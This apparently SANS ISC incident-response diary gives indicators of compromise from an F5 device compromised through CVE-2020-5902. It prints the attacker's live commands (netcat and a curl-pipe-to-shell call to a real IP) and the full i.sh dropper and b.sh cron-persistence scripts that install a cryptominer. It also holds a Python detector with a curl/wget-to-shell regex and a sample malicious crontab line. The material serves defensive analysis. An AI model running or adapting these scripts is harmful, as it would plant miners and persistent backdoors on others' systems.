A few IoCs related to CVE-2020-5902

Published: 2020-07-22. Last Updated: 2020-07-23 12:22:39 UTC
by Rick Wanner (Version: 2)
1 comment(s)

I know I am a bit late to the game, but a couple of weeks ago I responded to an incident resulting from an F5 compromise related to CVE-2020-5902. As I responded I captured a number of indicators of compromise. While I have not had a lot of time to dig into them, hopefully they will be of use to somebody.


The F5 vulnerability CVE-2020-5902 was announced, and patches and workarounds made available, by F5 on June 30, 2020. It carried a CVSS score of 10, which essentially meant that if the management interface of the F5 was exposed to the Internet it was trivial to exploit.


On this particular F5, probes for the presence of the vulnerability began on July 3, 2020, and over the course of the subsequent 4 days the device was probed for CVE-2020-5902 2561 times from 364 unique IPs.


The first detectable exploit was executed against the F5 on July 4, 2020. Exploits continued to be executed against the F5 a number of times over the next few days. It is hard to gauge the effectiveness of these exploits, but there is no indication that any of them achieved an effective foothold on the F5.


The first detectable foothold on the F5 was on July 6, 2020. As shown in an earlier diary, an alias was used to get access to a shell, which was used to execute:


nc 217.12.199.179 9999


which resulted in the execution of:


curl 217.12.199.179/i.sh | sh

As of this writing, 217.12.199.179 is still up and is still serving the shell scripts related to this attack.


Here are the contents of i.sh:

SHA256 - 34e0ad00a23762da270ad5a352d1e523f45a685b4a4931ae02973ecef79140c5 
https://www.virustotal.com/gui/file/34e0ad00a23762da270ad5a352d1e523f45a685b4a4931ae02973ecef79140c5/detection

#!/bin/sh
ulimit -n 65535
rm -f /etc/ld.so.preload

LDR="wget -q -O -"
if [ -s /usr/bin/curl ]; then
 LDR="curl"
fi
if [ -s /usr/bin/wget ]; then
 LDR="wget -q -O -"
fi


WGET="wget -O"
if [ -s /usr/bin/curl ]; then
 WGET="curl -o"
fi
if [ -s /usr/bin/wget ]; then
 WGET="wget -O"
fi

DIR="/tmp"
if [ -e "/tmp/bigip" ]; then
 if [ -w "/tmp/bigip" ] && [ ! -d "/tmp/bigip" ]; then
  if [ -x "$(command -v md5sum)" ]; then
   sum=$(md5sum /tmp/bigip | awk '{ print $1 }')
   echo $sum
   case $sum in
   fa3cf35e7e83175f395a5b6d35fd456d)
    echo "bigip OK"
    ;;
   *)
    echo "bigip wrong"
    rm -rf /tmp/bigip
    sleep 1
    ;;
   esac
  fi
  echo "P OK"
 else
  DIR=$(mktemp -d)/tmp
  mkdir $DIR
  echo "T DIR $DIR"
 fi
else
 if [ -d "/var/tmp" ]; then
  DIR="/var/tmp"
 fi
 echo "P NOT EXISTS"
fi

download() {
 if [ -x "$(command -v md5sum)" ]; then
  sum=$(md5sum $DIR/bigip | awk '{ print $1 }')
  echo $sum
  case $sum in
  fa3cf35e7e83175f395a5b6d35fd456d)
   echo "bigip OK"
   ;;
  *)
   echo "bigip wrong"
   download2
   ;;
  esac
 else
  echo "No md5sum"
  download2
 fi
}
download2() {
 $WGET $DIR/bigip https://bitbucket.org/sozmon3n3/git/raw/master/bigip
 chmod +x $DIR/bigip
 if [ -x "$(command -v md5sum)" ]; then
  sum=$(md5sum $DIR/bigip | awk '{ print $1 }')
  echo $sum
  case $sum in
  fa3cf35e7e83175f395a5b6d35fd456d)
   echo "bigip OK"
   ;;
  *)
   echo "bigip wrong"
   download3
   ;;
  esac
 else
  echo "No md5sum"
  download3
 fi
}

download3() {
 $WGET $DIR/bigip http://217.12.199.179/bigip
 chmod +x $DIR/bigip
 if [ -x "$(command -v md5sum)" ]; then
  sum=$(md5sum $DIR/bigip | awk '{ print $1 }')
  echo $sum
  case $sum in
  fa3cf35e7e83175f395a5b6d35fd456d)
   echo "bigip OK"
   ;;
  *)
   echo "bigip wrong"
   ;;
  esac
 else
  echo "No md5sum"
 fi
}

download
SKL=b $DIR/bigip

crontab -l | grep -e "217.12.199.179" | grep -v grep
if [ $? -eq 0 ]; then
 echo "cron good"
else
 (
  crontab -l 2>/dev/null
  echo "* * * * * $LDR http://217.12.199.179/b.sh | sh > /dev/null 2>&1"
 ) | crontab -
fi

i.sh also sets up persistence: the crontab entry it adds runs every minute and fetches and executes a second script, b.sh, from the same IP.

Here are the contents of b.sh:

SHA256 - 9994a3ab51521ee54902826d46de3f8c541e625873f10aec2568dd51ddf78f9c
https://www.virustotal.com/gui/file/9994a3ab51521ee54902826d46de3f8c541e625873f10aec2568dd51ddf78f9c/detection

#!/bin/sh
ulimit -n 65535
rm -f /etc/ld.so.preload

LDR="wget -q -O -"
if [ -s /usr/bin/curl ]; then
 LDR="curl"
fi
if [ -s /usr/bin/wget ]; then
 LDR="wget -q -O -"
fi

crontab -l | grep -e "217.12.199.179" | grep -v grep
if [ $? -eq 0 ]; then
 echo "cron good"
else
 (
  crontab -l 2>/dev/null
  echo "* * * * * $LDR http://217.12.199.179/b.sh | sh > /dev/null 2>&1"
 ) | crontab -
fi

i.sh also downloaded an executable called bigip to /var/tmp, which in turn launched a daemon process on the F5, /tmp/bigipdaemon.

c44b63b1b53cbd9852c71de84ce8ad75f623935f235484547e9d94a7bdf8aa76 bigip
https://www.virustotal.com/gui/file/c44b63b1b53cbd9852c71de84ce8ad75f623935f235484547e9d94a7bdf8aa76/detection

517168df462fd33d5946f8cc6a09090d1dfdac19b10ac8ef8e15e4583557749d  bigipdaemon
https://www.virustotal.com/gui/file/517168df462fd33d5946f8cc6a09090d1dfdac19b10ac8ef8e15e4583557749d/detection


The files are a cryptominer which mines cryptocurrency on behalf of the attacker. The firewall logs clearly show the cryptominer communicating with the IP in Ukraine from which the shell scripts were downloaded.

Besides the IP associated with the cryptomining, the attacker also communicated with 9 other IPs.

Cryptominer IPs
destination_address    destination_port    Country
217.12.199.179         80                  Ukraine

Other associated IPs:
destination_address    destination_port    Country
193.26.217.129         80                  Russia
193.53.127.188         80                  Russia
213.226.114.20         80                  Russia
213.32.10.148          80                  France
45.8.228.49            80                  Russia
5.23.52.131            80                  Russia
62.109.25.117          80                  Russia
95.142.44.164          80                  Russia
217.8.117.137          80                  Russia
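As an added example (not part of this diary or of the captured scripts), here is a small Python triage script that matches firewall log lines against the IP table above and flags crontab entries shaped like the one i.sh installs. The key=value log layout, the sample log lines and the sample crontab are constructed for illustration; the real F5 and firewall log formats are not shown in the diary.

```python
import re

# Network indicators taken from the diary above (cryptominer C2 plus the
# other associated destinations); ports and countries are omitted here.
IOC_IPS = {
    "217.12.199.179", "193.26.217.129", "193.53.127.188", "213.226.114.20",
    "213.32.10.148", "45.8.228.49", "5.23.52.131", "62.109.25.117",
    "95.142.44.164", "217.8.117.137",
}

# Constructed sample firewall log in an assumed key=value layout (the diary
# does not show the real log format).
SAMPLE_FW_LOG = """\
2020-07-06T14:02:11Z src=10.1.2.3 dst=217.12.199.179 dport=9999 proto=tcp action=allow
2020-07-06T14:02:15Z src=10.1.2.3 dst=217.12.199.179 dport=80 proto=tcp action=allow
2020-07-06T14:03:01Z src=10.1.2.3 dst=8.8.8.8 dport=53 proto=udp action=allow
2020-07-06T14:05:41Z src=10.1.2.3 dst=45.8.228.49 dport=80 proto=tcp action=allow
"""

# Constructed crontab: one benign entry and one shaped like the entry that
# i.sh/b.sh install ($LDR expanded to wget; fetch every minute, pipe to sh).
SAMPLE_CRONTAB = """\
0 3 * * * /usr/local/bin/backup.sh
* * * * * wget -q -O - http://217.12.199.179/b.sh | sh > /dev/null 2>&1
"""

LOG_RE = re.compile(r"dst=(?P<dst>[\d.]+)\s+dport=(?P<dport>\d+)")
# A cron command that downloads from a URL and pipes the result into sh/bash.
CRON_RE = re.compile(r"\b(?:curl|wget)\b[^|]*https?://[^\s|]+[^|]*\|\s*(?:ba)?sh\b")

def find_ioc_hits(log_text, iocs=IOC_IPS):
    """Return one record per log line whose destination is a listed indicator."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if m and m.group("dst") in iocs:
            hits.append({"dst": m.group("dst"), "dport": m.group("dport"), "line": line})
    return hits

def suspicious_cron_entries(crontab_text):
    """Flag crontab entries that pipe a freshly downloaded script into a shell."""
    return [l for l in crontab_text.splitlines()
            if not l.startswith("#") and CRON_RE.search(l)]

if __name__ == "__main__":
    for h in find_ioc_hits(SAMPLE_FW_LOG):
        print("IOC hit:", h["dst"], "port", h["dport"])
    for e in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("suspicious cron:", e)
```

The cron check looks for the expanded form of the entry (curl or wget with a URL, piped into sh), so it also catches variants pointing at other hosts than the one in this diary.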

I hope to get some time in the next few weeks to dig into this further, but hopefully this is of some use to someone in the meantime. If anyone has any more related IoCs, please include them in the comments or send them via the ISC contact page and I will update this diary with the new findings.

-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

Keywords: CVE20205902 F5 IoC

Comments

Just for the record, we had a compromised F5 system at a remote site (supplier chain) 3 days after the CVE announcement, where 2 additional user accounts were created on the compromised F5.
Unfortunately, we do not have access to any deeper logs. So the F5 was patched, reviewed and all uploaded TLS certificates were renewed and the (maybe) compromised old ones revoked. The private keys for the old certs were also uploaded before. I would advise anyone with any indicator of compromise to do the same. If anyone has further suggestions, please leave a comment here.

Thanks,
Ron
